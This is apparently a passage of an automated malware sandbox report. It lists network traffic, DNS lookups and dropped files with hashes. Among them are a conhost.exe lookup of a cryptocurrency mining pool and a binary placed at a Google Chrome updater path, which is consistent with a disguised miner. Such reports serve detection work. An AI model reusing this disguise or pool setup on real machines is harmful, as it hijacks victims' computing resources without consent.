                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206

                HTTP Request

                GET http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d

                HTTP Response

                206
              • 13.107.6.156:443
                https://www.office.com/pwa
                tls, http2
                wwahost.exe
                1.9kB
                12.7kB
                21
                20

                HTTP Request

                GET https://www.office.com/pwa

                HTTP Response

                200
              • 2.20.12.97:443
                res.cdn.office.net
                tls, http2
                wwahost.exe
                1.4kB
                5.0kB
                16
                14
              • 2.20.12.97:443
                res.cdn.office.net
                tls, http2
                wwahost.exe
                1.3kB
                6.3kB
                18
                15
              • 2.20.12.97:443
                res.cdn.office.net
                tls, http2
                wwahost.exe
                1.3kB
                6.3kB
                18
                16
              • 2.20.12.97:443
                res.cdn.office.net
                tls, http2
                wwahost.exe
                1.3kB
                6.3kB
                18
                15
              • 2.20.12.97:443
                res.cdn.office.net
                tls, http2
                wwahost.exe
                1.4kB
                5.0kB
                16
                14
              • 2.20.12.97:443
                https://res.cdn.office.net/officehub/officestartbundles/pwa-bootstrap.303ab5137e5e401578e9.js
                tls, http2
                wwahost.exe
                359.7kB
                7.4MB
                5369
                5346

                HTTP Request

                GET https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png

                HTTP Request

                GET https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png

                HTTP Request

                GET https://res.cdn.office.net/officehub/bundles/pwa-21c1529f14.css

                HTTP Request

                GET https://res.cdn.office.net/officehub/officestartbundles/main.67e42fd23a2b7a46f0bc.css

                HTTP Request

                GET https://res.cdn.office.net/officehub/officestartbundles/main.9460bc0ade9d5e4e6ec4.js

                HTTP Request

                GET https://res.cdn.office.net/officehub/officestartbundles/vendors.e20a05dacbab616aa4ce.js

                HTTP Request

                GET https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js

                HTTP Request

                GET https://res.cdn.office.net/officehub/images/content/images/pwa-unauth-hero-image-aa1ee34a38.png

                HTTP Request

                GET https://res.cdn.office.net/officehub/bundles/otel-logger-a79fa4a4c2580f67e6a9.js

                HTTP Response

                200

                HTTP Response

                200

                HTTP Response

                200

                HTTP Request

                GET https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png

                HTTP Request

                GET https://res.cdn.office.net/officehub/officestartbundles/pwa-bootstrap.303ab5137e5e401578e9.js

                HTTP Response

                200

                HTTP Response

                200

                HTTP Response

                200

                HTTP Response

                200

                HTTP Response

                200

                HTTP Response

                200

                HTTP Response

                200

                HTTP Response

                200
              • 2.20.12.97:443
                res.cdn.office.net
                tls, http2
                wwahost.exe
                1.1kB
                4.9kB
                15
                13
              • 2.20.12.97:443
                res.cdn.office.net
                tls, http2
                wwahost.exe
                1.1kB
                5.0kB
                15
                14
              • 172.165.69.228:443
                https://nav.smartscreen.microsoft.com/windows/browser/edge/actions
                tls, http2
                8.6kB
                11.7kB
                33
                23

                HTTP Request

                POST https://nav.smartscreen.microsoft.com/windows/browser/edge/service/navigate/4

                HTTP Request

                POST https://nav.smartscreen.microsoft.com/windows/browser/edge/actions

                HTTP Response

                200

                HTTP Response

                200
              • 172.165.69.228:443
                nav.smartscreen.microsoft.com
                tls, http2
                1.3kB
                9.2kB
                19
                16
              • 172.165.61.93:443
                data-edge.smartscreen.microsoft.com
                tls, http2
                1.4kB
                9.3kB
                21
                17
              • 172.165.61.93:443
                https://data-edge.smartscreen.microsoft.com/windows/browser/edge/data/toptraffic?pushCert=false&os=10.0.19041.1288.vb_release
                tls, http2
                22.7kB
                581.1kB
                441
                434

                HTTP Request

                GET https://data-edge.smartscreen.microsoft.com/windows/browser/edge/data/bloomfilter/x?pushCert=false&os=10.0.19041.1288.vb_release

                HTTP Request

                GET https://data-edge.smartscreen.microsoft.com/windows/browser/edge/data/toptraffic?pushCert=false&os=10.0.19041.1288.vb_release

                HTTP Request

                GET https://data-edge.smartscreen.microsoft.com/windows/browser/edge/data/script/2?pushCert=false

                HTTP Response

                200

                HTTP Request

                GET https://data-edge.smartscreen.microsoft.com/windows/browser/edge/data/bloomfilter/x?pushCert=false&os=10.0.19041.1288.vb_release

                HTTP Response

                200

                HTTP Response

                200

                HTTP Response

                304

                HTTP Request

                GET https://data-edge.smartscreen.microsoft.com/windows/browser/edge/data/script/2?pushCert=false

                HTTP Request

                GET https://data-edge.smartscreen.microsoft.com/windows/browser/edge/data/toptraffic?pushCert=false&os=10.0.19041.1288.vb_release

                HTTP Response

                304

                HTTP Response

                304
              • 172.165.61.93:443
                data-edge.smartscreen.microsoft.com
                tls, http2
                1.4kB
                9.3kB
                22
                18
              • 8.8.8.8:53
                g.bing.com
                dns
                56 B
                148 B
                1
                1

                DNS Request

                g.bing.com

                DNS Response

                150.171.28.10
                150.171.27.10

              • 8.8.8.8:53
                pool.hashvault.pro
                dns
                conhost.exe
                64 B
                96 B
                1
                1

                DNS Request

                pool.hashvault.pro

                DNS Response

                80.240.16.67
                192.248.189.11

              • 8.8.8.8:53
                msedge.api.cdp.microsoft.com
                dns
                148 B
                158 B
                2
                1

                DNS Request

                msedge.api.cdp.microsoft.com

                DNS Request

                msedge.api.cdp.microsoft.com

                DNS Response

                52.252.28.242

              • 8.8.8.8:53
                msedge.b.tlu.dl.delivery.mp.microsoft.com
                dns
                87 B
                344 B
                1
                1

                DNS Request

                msedge.b.tlu.dl.delivery.mp.microsoft.com

                DNS Response

                91.80.49.86
                91.81.130.134
                91.81.129.182
                91.81.129.180
                91.80.49.20

              • 8.8.8.8:53
                www.office.com
                dns
                wwahost.exe
                60 B
                168 B
                1
                1

                DNS Request

                www.office.com

                DNS Response

                13.107.6.156

              • 8.8.8.8:53
                res.cdn.office.net
                dns
                wwahost.exe
                64 B
                331 B
                1
                1

                DNS Request

                res.cdn.office.net

                DNS Response

                2.20.12.97
                2.20.12.98

              • 8.8.8.8:53
                nav.smartscreen.microsoft.com
                dns
                150 B
                192 B
                2
                1

                DNS Request

                nav.smartscreen.microsoft.com

                DNS Request

                nav.smartscreen.microsoft.com

                DNS Response

                172.165.69.228

              • 8.8.8.8:53
                data-edge.smartscreen.microsoft.com
                dns
                81 B
                199 B
                1
                1

                DNS Request

                data-edge.smartscreen.microsoft.com

                DNS Response

                172.165.61.93

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{F733EA1F-30E5-4069-868F-21D57DA887B8}\EDGEMITMP_07F86.tmp\setup.exe

                Filesize

                6.6MB

                MD5

                b4c8ad75087b8634d4f04dc6f92da9aa

                SHA1

                7efaa2472521c79d58c4ef18a258cc573704fb5d

                SHA256

                522a25568bb503cf8b44807661f31f0921dee91d37691bf399868733205690bf

                SHA512

                5094505b33a848badcffd6b3b93aad9ad73f391e201dee052376c4f8573ba351f0b8c102131216088ffb38d0ed7b5fe70ba95c3ac2c33a50c993584fe7c435e3

              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                Filesize

                3.7MB

                MD5

                3646786aea064c0845f5bb1b8e976985

                SHA1

                a31ba2d2192898d4c0a01511395bdf87b0e53873

                SHA256

                a129a6de7b90500483226192b260eaca1ee116a007771d421aa3eee38af48d6f

                SHA512

                145f8abf2ecffd8ecc3745dbd9ab2e360826fa46d6f21dbebece7802b9b5980f4ab19e2dfd180ce0cfb84366f3ac5c87cd1b74a085e1a0dd620b6c097900e0f4

              • C:\Program Files\Google\Chrome\updater.exe

                Filesize

                2.0MB

                MD5

                a16a669a09bf158058b83e04e69fe38e

                SHA1

                f6c94763850d9e590d86057139e8895a7aacdeea

                SHA256

                cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

                SHA512

                658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

              • C:\Program Files\Google\Libs\g.log

                Filesize

                226B

                MD5

                fdba80d4081c28c65e32fff246dc46cb

                SHA1

                74f809dedd1fc46a3a63ac9904c80f0b817b3686

                SHA256

                b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

                SHA512

                b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

              • C:\Program Files\msedge_installer.log

                Filesize

                70KB

                MD5

                21a7ad0bbf6fbb1772de44213b1d05ee

                SHA1

                68e3a575fc896d0c45aab08d3dcc9add5149b98c

                SHA256

                ea380d9d77b57d90e7b6fb66b70da2d13f1cc30764169062403f34bfb5291e25

                SHA512

